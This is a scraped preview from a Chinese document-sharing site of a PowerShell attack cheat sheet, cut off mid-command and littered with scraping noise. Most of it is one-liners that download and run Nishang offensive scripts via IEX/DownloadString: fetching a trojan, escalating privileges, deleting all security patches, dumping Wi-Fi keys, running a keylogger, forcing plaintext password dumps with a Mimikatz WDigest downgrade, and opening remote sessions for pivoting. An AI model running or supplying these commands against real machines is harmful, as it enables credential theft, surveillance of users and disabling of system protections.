powershell脚本利用介绍.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
利用powershell下载一个马: 利用WebClientT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security3 ~6 A8 s4 Z: N6 e5 t0 Y V% ~ 下载一个文件: powershell?(new-object System.Net.WebClient).DownloadFile( /360/inst.exe,d:\\test\\360.exe) 默认情况下,powershell不允许直接执行ps1脚本,但是使用如下的语句:可以绕过策略限制,直接执行一个ps1的脚本。5 k4 e7 ^9 l* ?, b- p: b4 ?Enable-DuplicateToken powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Enable-DuplicateToken.ps1);?Enable-DuplicateToken Remove-Update 删除补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?All ? ? ? ?//删除全部补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?KB2761226 ? ? ? ?//删除指定补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1);?Remove-Update?Security ? ? ? ?//删除安全更新 UAC科普: UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员?密码。通过在这些操作启动前对其进行验证,UAC 可以帮助防止恶意软件和间谍软件在未经许可的情况下在计算机上进行安装或对计算机进行更改。Get-WLAN-Keys: 获取无线连接历史密码: powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Get-WLAN-Keys.ps1);?Get-WLAN-Keys Keylogger: 键盘记录: (无测试) powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Keylogger.ps1);?Keylogger Invoke-MimikatzWdigestDowngrade 转储在Windows8.1和Server?2012的纯用户密码(测试失败) powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Invoke-MimikatzWDigestDowngrade.ps1);?MimikatzWDigestDowngrade Get-PassHints: 获取Windows用户的密码提示从目标。 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Gather/Get-PassHints.ps1);?Get-PassHints Pivot Create-MultipleSessions 检查在多台计算机证书,并创建PSSession中。: powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Pivot/Create-MultipleSessions.ps1);??Create-Mu

文档评论(0)

4477769 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档